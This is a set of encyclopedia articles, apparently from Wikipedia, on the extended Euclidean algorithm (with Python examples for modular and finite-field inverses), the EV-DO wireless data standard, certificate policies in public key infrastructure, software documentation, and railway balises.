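The pseudocode itself did not survive in this copy; the following Python sketch is a rendering of the procedure described above (the variable names old_r, old_s, old_t follow the conventions used elsewhere in this article):

```python
def extended_gcd(a, b):
    """Extended Euclidean algorithm.

    Returns (g, s, t, qa, qb) where s*a + t*b == g == gcd(a, b), and
    (qa, qb) are, up to sign, the quotients a/g and b/g."""
    old_r, r = a, b
    old_s, s = 1, 0
    old_t, t = 0, 1
    while r != 0:
        quotient = old_r // r
        old_r, r = r, old_r - quotient * r   # remainder sequence
        old_s, s = s, old_s - quotient * s   # Bezout coefficient of a
        old_t, t = t, old_t - quotient * t   # Bezout coefficient of b
    return old_r, old_s, old_t, t, s

# With the example input 240 and 46:
g, s, t, qa, qb = extended_gcd(240, 46)
assert (g, s, t) == (2, -9, 47) and s * 240 + t * 46 == g
```

The final values of the unreturned-at-loop-exit variables t and s are exactly the entries 23 and −120 (up to sign, the quotients by the gcd) discussed above.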
The quotients of a and b by their greatest common divisor, which are output, may have an incorrect sign. This is easy to correct at the end of the computation, but has not been done here, to keep the code simple. Similarly, if either a or b is zero and the other is negative, the greatest common divisor that is output is negative, and all the signs of the output must be changed.
Finally, notice that in Bézout's identity, ax + by = gcd(a, b), one can solve for y given a, b, x, and gcd(a, b). Thus, an optimization to the above algorithm is to compute only the s_k sequence (which yields the Bézout coefficient x), and then compute y at the end:
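A Python sketch of that optimization (the name bezout_t follows the article's own variable naming):

```python
def extended_gcd_opt(a, b):
    """Compute gcd and the Bezout coefficient x via the s-sequence only,
    then recover y = (gcd - x*a) / b at the end."""
    old_r, r = a, b
    old_s, s = 1, 0
    while r != 0:
        quotient = old_r // r
        old_r, r = r, old_r - quotient * r
        old_s, s = s, old_s - quotient * s
    # Solve a*x + b*y = gcd for y, given x = old_s:
    bezout_t = (old_r - old_s * a) // b if b != 0 else 0
    return old_r, old_s, bezout_t

assert extended_gcd_opt(240, 46) == (2, -9, 47)
```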
However, in many cases this is not really an optimization: whereas the former algorithm is not susceptible to overflow when used with machine integers (that is, integers with a fixed upper bound of digits), the multiplication of old_s * a in the computation of bezout_t can overflow, limiting this optimization to inputs which can be represented in less than half the maximal size. When using integers of unbounded size, the time needed for multiplication and division grows quadratically with the size of the integers. This implies that the "optimisation" replaces a sequence of multiplications/divisions of small integers by a single multiplication/division, which requires more computing time than the operations that it replaces, taken together.
A fraction a/b is in canonical simplified form if a and b are coprime and b is positive. This canonical simplified form can be obtained by replacing the three output lines of the preceding pseudocode by lines that output the fraction −t/s in this form.
The proof of this algorithm relies on the fact that s and t are two coprime integers such that as + bt = 0, and thus a/b = −t/s. To get the canonical simplified form, it suffices to move the minus sign so as to have a positive denominator.
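A Python sketch of this simplification (not the article's pseudocode, but the same computation):

```python
def simplify(a, b):
    """Canonical simplified form of a/b: coprime numerator and denominator,
    with a positive denominator."""
    old_r, r = a, b
    old_s, s = 1, 0
    old_t, t = 0, 1
    while r != 0:
        quotient = old_r // r
        old_r, r = r, old_r - quotient * r
        old_s, s = s, old_s - quotient * s
        old_t, t = t, old_t - quotient * t
    # a*s + b*t == 0 with gcd(s, t) = 1, hence a/b == -t/s
    num, den = -t, s
    if den < 0:                  # move the sign to the numerator
        num, den = -num, -den
    return num, den

assert simplify(240, 46) == (120, 23)
```

As noted below, when b divides a evenly the loop runs once, s ends at 1, and the output is an integer.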
If b divides a evenly, the algorithm executes only one iteration, and we have s = 1 at the end of the algorithm. It is the only case where the output is an integer.
The extended Euclidean algorithm is the essential tool for computing multiplicative inverses in modular structures, typically the modular integers and the algebraic field extensions. A notable instance of the latter case are the finite fields of non-prime order.
If n is a positive integer, the ring Z/nZ may be identified with the set {0, 1, …, n − 1} of the remainders of Euclidean division by n, the addition and the multiplication consisting in taking the remainder by n of the result of the addition and the multiplication of integers. An element a of Z/nZ has a multiplicative inverse (that is, it is a unit) if and only if it is coprime to n. In particular, if n is prime, a has a multiplicative inverse if and only if it is not zero (modulo n). Thus Z/nZ is a field if and only if n is prime.
Bézout's identity asserts that a and n are coprime if and only if there exist integers s and t such that ns + at = 1.
Reducing this identity modulo n gives at ≡ 1 (mod n).
Thus t, or, more exactly, the remainder of the division of t by n, is the multiplicative inverse of a modulo n.
To adapt the extended Euclidean algorithm to this problem, one should remark that the Bézout coefficient of n is not needed, and thus does not need to be computed. Also, to get a result which is positive and less than n, one may use the fact that the integer t provided by the algorithm satisfies |t| < n. That is, if t < 0, one must add n to it at the end. This results in the pseudocode, in which the input n is an integer larger than 1.
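The pseudocode is missing from this copy; the following Python sketch reproduces the procedure just described, computing only the t-sequence and normalizing the result into the range 0 … n − 1:

```python
def modular_inverse(a, n):
    """Inverse of a modulo n, without computing the Bezout coefficient of n."""
    t, new_t = 0, 1
    r, new_r = n, a
    while new_r != 0:
        quotient = r // new_r
        t, new_t = new_t, t - quotient * new_t
        r, new_r = new_r, r - quotient * new_r
    if r > 1:
        raise ValueError("a is not invertible modulo n")
    if t < 0:          # normalize into 0 .. n-1
        t += n
    return t

assert modular_inverse(7, 26) == 15   # 7 * 15 = 105 = 4 * 26 + 1
```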
The extended Euclidean algorithm is also the main tool for computing multiplicative inverses in simple algebraic field extensions. An important case, widely used in cryptography and coding theory, is that of finite fields of non-prime order. In fact, if p is a prime number, and q = p^d, the field of order q is a simple algebraic extension of the prime field of p elements, generated by a root of an irreducible polynomial of degree d.
A simple algebraic extension L of a field K, generated by a root of an irreducible polynomial p of degree d, may be identified with the quotient ring K[X]/⟨p⟩, and its elements are in bijective correspondence with the polynomials of degree less than d. The addition in L is the addition of polynomials. The multiplication in L is the remainder of the Euclidean division by p of the product of polynomials. Thus, to complete the arithmetic in L, it remains only to define how to compute multiplicative inverses. This is done by the extended Euclidean algorithm.
The algorithm is very similar to that provided above for computing the modular multiplicative inverse. There are two main differences: firstly, the next-to-last line is not needed, because the Bézout coefficient that is provided always has a degree less than d. Secondly, the greatest common divisor which is provided, when the input polynomials are coprime, may be any nonzero element of K; this Bézout coefficient (a polynomial generally of positive degree) has thus to be multiplied by the inverse of this element of K. In the pseudocode which follows, p is a polynomial of degree greater than one, and a is a polynomial.
For example, if the polynomial used to define the finite field GF(2^8) is p = x^8 + x^4 + x^3 + x + 1, and a = x^6 + x^4 + x + 1 is the element whose inverse is desired, then performing the algorithm results in the computation described in the following table. Let us recall that in fields of order 2^n, one has −z = z and z + z = 0 for every element z in the field. Since 1 is the only nonzero element of GF(2), the adjustment in the last line of the pseudocode is not needed.
Thus, the inverse is x^7 + x^6 + x^3 + x, as can be confirmed by multiplying the two elements together, and taking the remainder by p of the result.
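This can be checked numerically by representing GF(2^8) elements as bit masks (x^6 + x^4 + x + 1 is 0x53 and x^7 + x^6 + x^3 + x is 0xCA). The brute-force inverse below is only a verification sketch, not the extended-Euclidean computation of the article:

```python
P = 0x11B  # x^8 + x^4 + x^3 + x + 1, the reduction polynomial of GF(2^8)

def gf_mul(a, b):
    """Multiply two GF(2^8) elements (polynomials over GF(2), reduced mod P)."""
    result = 0
    while b:
        if b & 1:
            result ^= a
        a <<= 1
        if a & 0x100:      # degree reached 8: reduce by P
            a ^= P
        b >>= 1
    return result

def gf_inv(a):
    """Brute-force multiplicative inverse of a nonzero element."""
    return next(x for x in range(1, 256) if gf_mul(a, x) == 1)

assert gf_inv(0x53) == 0xCA   # (x^6 + x^4 + x + 1)^(-1) = x^7 + x^6 + x^3 + x
```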
One can handle the case of more than two numbers iteratively. First we show that gcd(a, b, c) = gcd(gcd(a, b), c). To prove this, let d = gcd(a, b, c). By definition of the gcd, d is a divisor of a and b. Thus gcd(a, b) = kd for some k. Similarly, d is a divisor of c, so c = jd for some j. Let u = gcd(k, j). By our construction of u, ud divides a, b and c, but since d is the greatest such divisor, u is a unit. And since ud = gcd(gcd(a, b), c), the result is proven.
So if na + mb = gcd(a, b), then there are x and y such that x gcd(a, b) + yc = gcd(a, b, c), so the final equation will be x(na + mb) + yc = xna + xmb + yc = gcd(a, b, c).
So then to apply to n numbers we use induction: gcd(a_1, a_2, …, a_n) = gcd(a_1, gcd(a_2, …, a_n)),
with the equations following directly.
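A Python sketch of this iterative extension (the helper egcd and the name bezout_many are illustrative, not from the article):

```python
def egcd(a, b):
    """Return (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    g, x, y = egcd(b, a % b)
    return g, y, x - (a // b) * y

def bezout_many(nums):
    """gcd of all the numbers, plus coefficients c_i with sum(c_i * n_i) == gcd."""
    g, coeffs = nums[0], [1]
    for m in nums[1:]:
        g, x, y = egcd(g, m)
        # fold the new pair (x, y) into the accumulated coefficients
        coeffs = [c * x for c in coeffs] + [y]
    return g, coeffs

g, c = bezout_many([15, 10, 6])
assert g == 1 and sum(ci * ni for ci, ni in zip(c, [15, 10, 6])) == 1
```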
https://en.wikipedia.org/wiki/Extended_Euclidean_algorithm
Evolution-Data Optimized (EV-DO, EVDO, etc.) is a telecommunications standard for the wireless transmission of data through radio signals, typically for broadband Internet access. EV-DO is an evolution of the CDMA2000 (IS-2000) standard which supports high data rates and can be deployed alongside a wireless carrier's voice services. It uses advanced multiplexing techniques including code-division multiple access (CDMA) as well as time-division multiplexing (TDM) to maximize throughput. It is a part of the CDMA2000 family of standards and has been adopted by many mobile phone service providers around the world, particularly those previously employing CDMA networks. It is also used on the Globalstar satellite phone network.[1]
An EV-DO channel has a bandwidth of 1.25 MHz, the same bandwidth size that IS-95A (IS-95) and IS-2000 (1xRTT) use,[2] though the channel structure is very different. The back-end network is entirely packet-based, and is not constrained by restrictions typically present on a circuit-switched network.
The EV-DO feature of CDMA2000 networks provides access to mobile devices with forward link air interface speeds of up to 2.4 Mbit/s with Rel. 0 and up to 3.1 Mbit/s with Rev. A. The reverse link rate for Rel. 0 can operate up to 153 kbit/s, while Rev. A can operate at up to 1.8 Mbit/s. It was designed to be operated end-to-end as an IP-based network, and can support any application which can operate on such a network within its bit-rate constraints.
There have been several revisions of the standard, starting with Release 0 (Rel. 0). This was later expanded upon with Revision A (Rev. A) to support quality of service (to improve latency) and higher rates on the forward and reverse link. In late 2006, Revision B (Rev. B) was published, whose features include the ability to bundle multiple carriers to achieve even higher rates and lower latencies (see TIA-856 Rev. B below). The upgrade from EV-DO Rev. A to Rev. B involves a software update of the cell site modem, and additional equipment for new EV-DO carriers. Existing cdma2000 operators may have to retune some of their existing 1xRTT channels to other frequencies, as Rev. B requires all DO carriers be within 5 MHz.
The initial design of EV-DO was developed by Qualcomm in 1999 to meet IMT-2000 requirements for a greater-than-2 Mbit/s downlink for stationary communications, as opposed to mobile communication (i.e., moving cellular phone service). Initially, the standard was called High Data Rate (HDR), but it was renamed to 1xEV-DO after it was ratified by the International Telecommunication Union (ITU) under the designation TIA-856. Originally, 1xEV-DO stood for "1x Evolution-Data Only", referring to its being a direct evolution of the 1x (1xRTT) air interface standard, with its channels carrying only data traffic. The title of the 1xEV-DO standard document is "cdma2000 High Rate Packet Data Air Interface Specification", as cdma2000 (lowercase) is another name for the 1x standard, numerically designated as TIA-2000.
Later, due to possible negative connotations of the word "only", the "DO" part of the standard's name was changed to stand for "Data Optimized", so that EV-DO now stands for "Evolution-Data Optimized". The 1x prefix has been dropped by many of the major carriers, and the technology is marketed simply as EV-DO.[3] This provides a more market-friendly emphasis of the technology being data-optimized.
The primary characteristic that differentiates an EV-DO channel from a 1xRTT channel is that it is time-multiplexed on the forward link (from the tower to the mobile). This means that a single mobile has full use of the forward traffic channel within a particular geographic area (a sector) during a given slot of time. Using this technique, EV-DO is able to modulate each user's time slot independently. This allows the service of users in favorable RF conditions with very complex modulation techniques, while also serving users in poor RF conditions with simpler (and more redundant) signals.[4]
The forward channel is divided into slots, each being 1.667 ms long. In addition to user traffic, overhead channels are interlaced into the stream; these include the 'pilot', which helps the mobile find and identify the channel, the Media Access Channel (MAC), which tells the mobile devices when their data is scheduled, and the 'control channel', which contains other information the network needs the mobile devices to know.
The modulation to be used to communicate with a given mobile unit is determined by the mobile device itself; it listens to the traffic on the channel, and depending on the received signal strength along with the perceived multipath and fading conditions, makes a best guess as to what data rate it can sustain while maintaining a reasonable frame error rate of 1–2%. It then communicates this information back to the serving sector in the form of an integer between 1 and 12 on the "Digital Rate Control" (DRC) channel. Alternatively, the mobile can select a "null" rate (DRC 0), indicating that the mobile either cannot decode data at any rate, or that it is attempting to hand off to another serving sector.[4]
The DRC values are as follows:[5]
Another important aspect of the EV-DO forward link channel is the scheduler. The scheduler most commonly used is called "proportional fair". It is designed to maximize sector throughput while also guaranteeing each user a certain minimum level of service. The idea is to schedule mobiles reporting higher DRC indices more often, with the hope that those reporting worse conditions will improve in time.
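As an illustrative sketch (hypothetical parameter names, not taken from the standard), one proportional-fair scheduling decision serves the user maximizing the ratio of requested instantaneous rate to exponentially averaged past throughput:

```python
def proportional_fair(rates, avg, alpha=0.1):
    """One slot decision: pick argmax(rate_i / avg_i), then update the
    exponentially weighted average throughput of every user."""
    chosen = max(range(len(rates)), key=lambda i: rates[i] / avg[i])
    new_avg = [(1 - alpha) * a + alpha * (rates[i] if i == chosen else 0.0)
               for i, a in enumerate(avg)]
    return chosen, new_avg

# A user with a mediocre requested rate but little past service wins the slot:
chosen, _ = proportional_fair([2400.0, 600.0], [2000.0, 100.0])
assert chosen == 1    # 600/100 = 6 beats 2400/2000 = 1.2
```

Because the averages of unserved users decay, their priority ratio rises over time, which is the "certain minimum level of service" guarantee described above.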
The system also incorporates Incremental Redundancy Hybrid ARQ. Each sub-packet of a multi-slot transmission is a turbo-coded replica of the original data bits. This allows mobiles to acknowledge a packet before all of its sub-packets have been transmitted. For example, if a mobile transmits a DRC index of 3 and is scheduled to receive data, it will expect to get data during four time slots. If after decoding the first slot the mobile is able to determine the entire data packet, it can send an early acknowledgement back at that time; the remaining three sub-packets will be cancelled. If, however, the packet is not acknowledged, the network will proceed with the transmission of the remaining parts until all have been transmitted or the packet is acknowledged.[4]
The reverse link (from the mobile back to the Base Transceiver Station) on EV-DO Rel. 0 operates very similarly to that of CDMA2000 1xRTT. The channel includes a reverse link pilot (which helps with decoding the signal) along with the user data channels. Some additional channels that do not exist in 1x include the DRC channel (described above) and the ACK channel (used for HARQ). Only the reverse link has any sort of power control, because the forward link is always transmitted at full power for use by all the mobiles.[5] The reverse link has both open-loop and closed-loop power control. In the open loop, the reverse link transmission power is set based upon the received power on the forward link. In the closed loop, the reverse link power is adjusted up or down 800 times a second, as indicated by the serving sector (similar to 1x).[6]
All of the reverse link channels are combined using code division and transmitted back to the base station using BPSK,[7] where they are decoded. The maximum speed available for user data is 153.2 kbit/s, but in real-life conditions this is rarely achieved. Typical speeds achieved are between 20 and 50 kbit/s.
Revision A of EV-DO makes several additions to the protocol while keeping it completely backwards compatible with Release 0.
These changes included the introduction of several new forward link data rates that increase the maximum burst rate from 2.45 Mbit/s to 3.1 Mbit/s. Also included were protocols that decrease connection establishment time (called enhanced access channel MAC), the ability for more than one mobile to share the same timeslot (multi-user packets) and the introduction of QoS flags. All of these were put in place to allow for low-latency, low-bit-rate communications such as VoIP.[8]
The additional forward rates for EV-DO Rev. A are:[9]
In addition to the changes on the forward link, the reverse link was enhanced to support higher-complexity modulation (and thus higher bit rates). An optional secondary pilot was added, which is activated by the mobile when it tries to achieve enhanced data rates. To combat reverse link congestion and noise rise, the protocol calls for each mobile to be given an interference allowance, which is replenished by the network when the reverse link conditions allow it.[9] The reverse link has a maximum rate of 1.8 Mbit/s, but under normal conditions users experience a rate of approximately 500–1000 kbit/s, with more latency than DOCSIS and DSL.
EV-DO Rev. B is a multi-carrier evolution of the Rev. A specification. It maintains the capabilities of EV-DO Rev. A, and provides the following enhancements:
Qualcomm realized early on that EV-DO was a stop-gap solution, foresaw an upcoming format war with LTE, and determined that a new standard would be needed. Qualcomm originally called this technology EV-DV (Evolution Data and Voice).[10] As EV-DO became more pervasive, EV-DV evolved into EV-DO Rev. C.
The EV-DO Rev. C standard was specified by 3GPP2 to improve the CDMA2000 mobile phone standard for next-generation applications and requirements. It was proposed by Qualcomm as the natural evolution path for CDMA2000, and the specifications were published by 3GPP2 (C.S0084-*) and TIA (TIA-1121) in 2007 and 2008, respectively.[11][12]
The brand name UMB (Ultra Mobile Broadband) was introduced in 2006 as a synonym for this standard.[13]
UMB was intended to be a fourth-generation technology, which would make it compete with LTE and WiMAX. These technologies use a high-bandwidth, low-latency, underlying TCP/IP network with high-level services such as voice built on top. Widespread deployment of 4G networks promised to make applications that were previously not feasible not only possible but ubiquitous. Examples of such applications include mobile high-definition video streaming and mobile gaming.
Like LTE, the UMB system was to be based upon Internet networking technologies running over a next generation radio system, with peak rates of up to 280 Mbit/s. Its designers intended for the system to be more efficient and capable of providing more services than the technologies it was intended to replace. To provide compatibility with the systems it was intended to replace, UMB was to support handoffs with other technologies including existing CDMA2000 1X and 1xEV-DO systems.
UMB's use of OFDMA would have eliminated many of the disadvantages of the CDMA technology used by its predecessor, including the "breathing" phenomenon, the difficulty of adding capacity via microcells, the fixed bandwidth sizes that limit the total bandwidth available to handsets, and the near complete control by one company of the required intellectual property.
While the capacity of existing Rel. B networks can be increased 1.5-fold by using the EVRC-B voice codec and QLIC handset interference cancellation, 1x Advanced and EV-DO Advanced offer up to a 4x network capacity increase using BTS interference cancellation (reverse link interference cancellation), multi-carrier links, and smart network management technologies.[14][15]
In November 2008, Qualcomm, UMB's lead sponsor, announced it was ending development of the technology, favoring LTE instead. This followed the announcement that most CDMA carriers had chosen to adopt either the WiMAX or LTE standard as their 4G technology; in fact, no carrier had announced plans to adopt UMB.[16]
However, during the ongoing development of 4G technology, 3GPP added functionality to LTE, allowing it to become the sole upgrade path for all wireless networks.
|
https://en.wikipedia.org/wiki/EVDO
|
A certificate policy (CP) is a document which states the different entities of a public key infrastructure (PKI), their roles, and their duties. This document is published in the PKI perimeter.
When used with X.509 certificates, a specific field can be set to include a link to the associated certificate policy. Thus, during an exchange, any relying party has access to the assurance level associated with the certificate, and can decide on the level of trust to put in the certificate.
The reference document for writing a certificate policy is, as of December 2010, RFC 3647. The RFC proposes a framework for the writing of certificate policies and Certification Practice Statements (CPS). The points described below are based on the framework presented in the RFC.
The document should describe the general architecture of the related PKI, present the different entities of the PKI, and describe any exchange based on certificates issued by this same PKI.
An important point of the certificate policy is the description of the authorized and prohibited certificate uses. When a certificate is issued, it can be stated in its attributes what use cases it is intended to fulfill. For example, a certificate can be issued for digital signature of e-mail (aka S/MIME), encryption of data, authentication (e.g. of a Web server, as when one uses HTTPS), or further issuance of certificates (delegation of authority). Prohibited uses are specified in the same way.
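The idea of checking an intended use against the uses a policy authorizes can be sketched in a few lines. This is a toy illustration only: the profile names and the authorized-use sets below are hypothetical examples invented for this sketch, not drawn from any real certificate policy or from the X.509 keyUsage encoding.

```python
# Toy model of a certificate policy's authorized-use rules.
# Profile names and use-case labels are hypothetical.
AUTHORIZED_USES = {
    "email-cert": {"digital-signature", "email-encryption"},   # S/MIME-style
    "tls-server-cert": {"server-authentication"},              # HTTPS-style
    "ca-cert": {"certificate-issuance"},                       # delegation
}

def is_use_permitted(cert_profile: str, requested_use: str) -> bool:
    """Return True only if the requested use appears in the profile's
    authorized-use set; anything not explicitly authorized is prohibited."""
    return requested_use in AUTHORIZED_USES.get(cert_profile, set())

print(is_use_permitted("email-cert", "digital-signature"))      # True
print(is_use_permitted("email-cert", "server-authentication"))  # False
```

The default-deny behaviour (an unknown profile permits nothing) mirrors the text: prohibited uses are whatever the policy does not authorize.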
The document also describes how certificate names are to be chosen, as well as the associated needs for identification and authentication. When a certification application is filed, the certification authority (or, by delegation, the registration authority) is in charge of checking the information provided by the applicant, such as their identity. This is to make sure that the CA does not take part in identity theft.
The different procedures for certificate application, issuance, acceptance, renewal, re-key, modification and revocation are a large part of the document. These procedures describe how each actor of the PKI has to act in order for the whole assurance level to be accepted.
A chapter then covers the physical and procedural controls, audit and logging procedures involved in the PKI to ensure data integrity, availability and confidentiality.
This part describes the technical requirements regarding key sizes, protection of private keys (by use of key escrow) and various types of controls regarding the technical environment (computers, network).
Such lists (e.g., certificate revocation lists) are a vital part of any public key infrastructure, and as such, a specific chapter is dedicated to the description of the management associated with these lists, to ensure consistency between certificate status and the content of the list.
The PKI needs to be audited to ensure it complies with the rules stated in its documents, such as the certificate policy. The procedures used to assess such compliance are described here.
This last chapter tackles all remaining points, for example all the PKI-associated legal matters.
|
https://en.wikipedia.org/wiki/Certificate_policy
|
Software documentation is written text or illustration that accompanies computer software or is embedded in the source code. The documentation either explains how the software operates or how to use it, and may mean different things to people in different roles.
Documentation is an important part of software engineering. Types of documentation include:
Requirements documentation is the description of what a particular software does or should do. It is used throughout development to communicate how the software functions or how it is intended to operate. It is also used as an agreement or as the foundation for agreement on what the software will do. Requirements are produced and consumed by everyone involved in the production of software, including: end users, customers, project managers, sales, marketing, software architects, usability engineers, interaction designers, developers, and testers.
Requirements come in a variety of styles, notations and formality. Requirements can be goal-like (e.g., distributed work environment), close to design (e.g., builds can be started by right-clicking a configuration file and selecting the 'build' function), and anything in between. They can be specified as statements in natural language, as drawn figures, as detailed mathematical formulas, or as a combination of them all.
The variation and complexity of requirements documentation make it a proven challenge. Requirements may be implicit and hard to uncover. It is difficult to know exactly how much and what kind of documentation is needed and how much can be left to the architecture and design documentation, and it is difficult to know how to document requirements considering the variety of people who will read and use the documentation. Thus, requirements documentation is often incomplete (or non-existent). Without proper requirements documentation, software changes become more difficult, and therefore more error-prone (decreased software quality) and time-consuming (expensive).
The need for requirements documentation is typically related to the complexity of the product, the impact of the product, and the life expectancy of the software. If the software is very complex or developed by many people (e.g., mobile phone software), requirements can help better communicate what to achieve. If the software is safety-critical and can have a negative impact on human life (e.g., nuclear power systems, medical equipment, mechanical equipment), more formal requirements documentation is often required. If the software is expected to live for only a month or two (e.g., very small mobile phone applications developed specifically for a certain campaign), very little requirements documentation may be needed. If the software is a first release that is later built upon, requirements documentation is very helpful when managing the change of the software and verifying that nothing has been broken in the software when it is modified.
Traditionally, requirements are specified in requirements documents (e.g. using word processing applications and spreadsheet applications). To manage the increased complexity and changing nature of requirements documentation (and software documentation in general), database-centric systems and special-purpose requirements management tools are advocated.
In Agile software development, requirements are often expressed as user stories with accompanying acceptance criteria. User stories are typically part of a feature, or an epic, which is a broader functionality or set of related functionalities that deliver a specific value to the user based on the business requirements.
Architecture documentation (also known as software architecture description) is a special type of design document. In a way, architecture documents are third derivative from the code (design documents being second derivative, and code documents being first). Very little in the architecture documents is specific to the code itself. These documents do not describe how to program a particular routine, or even why that particular routine exists in the form that it does; instead they merely lay out the general requirements that would motivate the existence of such a routine. A good architecture document is short on details but thick on explanation. It may suggest approaches for lower-level design, but leaves the actual exploration trade studies to other documents.
Another type of design document is the comparison document, or trade study. This would often take the form of a whitepaper. It focuses on one specific aspect of the system and suggests alternate approaches. It could be at the user interface, code, design, or even architectural level. It will outline what the situation is, describe one or more alternatives, and enumerate the pros and cons of each. A good trade study document is heavy on research, expresses its idea clearly (without relying heavily on obtuse jargon to dazzle the reader), and most importantly is impartial. It should honestly and clearly explain the costs of whatever solution it offers as best. The objective of a trade study is to devise the best solution, rather than to push a particular point of view. It is perfectly acceptable to state no conclusion, or to conclude that none of the alternatives are sufficiently better than the baseline to warrant a change. It should be approached as a scientific endeavor, not as a marketing technique.
A very important part of the design document in enterprise software development is the Database Design Document (DDD). It contains Conceptual, Logical, and Physical Design Elements. The DDD includes the formal information that the people who interact with the database need. The purpose of preparing it is to create a common source to be used by all players within the scene. The potential users are:
When talking about relational database systems, the document should include the following parts:
It is important to include all information that is to be used by the actors involved, and to update the document as changes occur in the database.
It is important for the code documents associated with the source code (which may include README files and API documentation) to be thorough, but not so verbose that it becomes overly time-consuming or difficult to maintain them. Various how-to and overview documentation guides are commonly found specific to the software application or software product being documented by API writers. This documentation may be used by developers, testers, and also end-users. Today, a lot of high-end applications are seen in the fields of power, energy, transportation, networks, aerospace, safety, security, industry automation, and a variety of other domains. Technical documentation has become important within such organizations as the basic and advanced level of information may change over a period of time with architecture changes. There is evidence that the existence of good code documentation actually reduces maintenance costs for software.[1]
Code documents are often organized into a reference guide style, allowing a programmer to quickly look up an arbitrary function or class.
Often, tools such as Doxygen, NDoc, Visual Expert, Javadoc, JSDoc, EiffelStudio, Sandcastle, ROBODoc, POD, TwinText, or Universal Report can be used to auto-generate the code documents; that is, they extract the comments and software contracts, where available, from the source code and create reference manuals in such forms as text or HTML files.
The idea of auto-generating documentation is attractive to programmers for various reasons. For example, because it is extracted from the source code itself (for example, through comments), the programmer can write it while referring to the code, and use the same tools used to create the source code to make the documentation. This makes it much easier to keep the documentation up-to-date.
A possible downside is that only programmers can edit this kind of documentation, and it depends on them to refresh the output (for example, by running a cron job to update the documents nightly). Some would characterize this as a pro rather than a con.
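The extract-from-source idea the tools above implement can be shown in miniature with Python's standard library: a docstring lives next to the code it describes, and a generator pulls the signature and docstring out of the live object. The `moving_average` function is an invented example; `inspect.signature` and `inspect.getdoc` are real stdlib calls.

```python
import inspect

def moving_average(values, window):
    """Return the simple moving average of `values` over `window` points.

    Raises ValueError if `window` is larger than the input.
    """
    if window > len(values):
        raise ValueError("window larger than input")
    return [sum(values[i:i + window]) / window
            for i in range(len(values) - window + 1)]

# A documentation generator extracts the signature and docstring
# directly from the source object, so the reference manual entry
# stays next to the code it describes.
doc_entry = "{}{}\n{}".format(
    moving_average.__name__,
    inspect.signature(moving_average),
    inspect.getdoc(moving_average),
)
print(doc_entry)
```

Tools such as Sphinx or pydoc do essentially this at scale, then render the collected entries to HTML or text.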
Respected computer scientist Donald Knuth has noted that documentation can be a very difficult afterthought process and has advocated literate programming, written at the same time and location as the source code and extracted by automatic means. The programming languages Haskell and CoffeeScript have built-in support for a simple form of literate programming, but this support is not widely used.
Elucidative Programming is the result of practical applications of Literate Programming in real programming contexts. The Elucidative paradigm proposes that source code and documentation be stored separately.
Often, software developers need to be able to create and access information that is not going to be part of the source file itself. Such annotations are usually part of several software development activities, such as code walks and porting, where third-party source code is analysed in a functional way. Annotations can therefore help the developer during any stage of software development where a formal documentation system would hinder progress.
Unlike code documents, user documents simply describe how a program is used.
In the case of a software library, the code documents and user documents could in some cases be effectively equivalent and worth conjoining, but for a general application this is not often true.
Typically, the user documentation describes each feature of the program, and assists the user in realizing these features. It is very important for user documents not to be confusing, and for them to be up to date. User documents do not need to be organized in any particular way, but it is very important for them to have a thorough index. Consistency and simplicity are also very valuable. User documentation is considered to constitute a contract specifying what the software will do. API writers are well suited to writing good user documents, as they are well aware of the software architecture and programming techniques used. See also technical writing.
User documentation can be produced in a variety of online and print formats.[2]However, there are three broad ways in which user documentation can be organized.
A common complaint among users regarding software documentation is that only one of these three approaches was taken to the near-exclusion of the other two. It is common to limit provided software documentation for personal computers to online help that gives only reference information on commands or menu items. The job of tutoring new users or helping more experienced users get the most out of a program is left to private publishers, who are often given significant assistance by the software developer.
Like other forms of technical documentation, good user documentation benefits from an organized process of development. In the case of user documentation, the process as it commonly occurs in industry consists of five steps:[5]
For many applications it is necessary to have some promotional materials to encourage casual observers to spend more time learning about the product. This form of documentation has three purposes:
"The resistance to documentation among developers is well known and needs no emphasis."[10] This situation is particularly prevalent in agile software development because these methodologies try to avoid any unnecessary activities that do not directly bring value.
Specifically, the Agile Manifesto advocates valuing "working software over comprehensive documentation", which could be interpreted cynically as "We want to spend all our time coding. Remember, real programmers don't write documentation."[11]
A survey among software engineering experts revealed, however, that documentation is by no means considered unnecessary in agile development.
Yet it is acknowledged that there are motivational problems in development, and that documentation methods tailored to agile development (e.g. through reputation systems and gamification) may be needed.[12][13]
Docs as Code is an approach to documentation that treats it with the same rigor and processes as software code. This includes:
|
https://en.wikipedia.org/wiki/Software_documentation
|
A balise (/bəˈliːz/ bə-LEEZ) is an electronic beacon or transponder placed between the rails of a railway as part of an automatic train protection (ATP) system. The French word balise is used to distinguish these beacons from other kinds of beacons.[1]
Balises are used in the KVB signalling system installed on main lines of the French railway network, other than the high-speed Lignes à Grande Vitesse.
Balises constitute an integral part of the European Train Control System, where they serve as "beacons" giving the exact location of a train. The ETCS signalling system is gradually being introduced on railways throughout the European Union.[2]
Balises are also used in the Chinese Train Control System versions CTCS-2 and CTCS-3 installed on high-speed rail lines in China, which is based on the European Train Control System.
A balise which complies with the European Train Control System specification is called a Eurobalise.
A balise typically needs no power source. In response to radio frequency energy broadcast by a Balise Transmission Module mounted under a passing train, the balise either transmits information to the train (uplink) or receives information from the train (downlink, although this function is rarely used). The transmission rate of Eurobalises is sufficient for a complete 'telegram' to be received by a train passing at any speed up to 500 km/h.
A balise may be either a 'Fixed Data Balise', or 'Fixed Balise' for short, transmitting the same data to every train, or a 'Transparent Data Balise' which transmits variable data, also called a 'Switchable' or 'Controllable Balise'. (Note that the word 'fixed' refers to the information transmitted by the balise, not to its physical location. All balises are immobile).
A fixed balise is programmed to transmit the same data to every train. Information transmitted by a fixed balise typically includes: the location of the balise; the geometry of the line, such as curves and gradients; and any speed restrictions. The programming is performed using a wireless programming device. Thus a fixed balise can notify a train of its exact location, and the distance to the next signal, and can warn of any speed restrictions.
A controllable balise is connected to a Lineside Electronics Unit (LEU), which transmits dynamic data to the train, such as signal indications. Balises forming part of an ETCS Level 1 signalling system employ this capability.[3] The LEU integrates with the conventional (national) signal system either by connecting to the lineside railway signal or to the signalling control tower.
Balises must be deployed in pairs so that the train can distinguish the direction of travel 1→2 from direction 2→1, unless they are linked to a previous balise group in which case they can contain only one balise. Extra balises can be installed if the volume of data is too great.
Balises operate with equipment on the train to provide a system that enhances the safety of train operation: at the approaches to stations with multiple platforms, fixed balises may be deployed, as a more accurate supplement to GPS, to enable safe operation of automatic selective door opening.[4]
The balise is typically mounted on or between sleepers or ties in the centre line of the track.
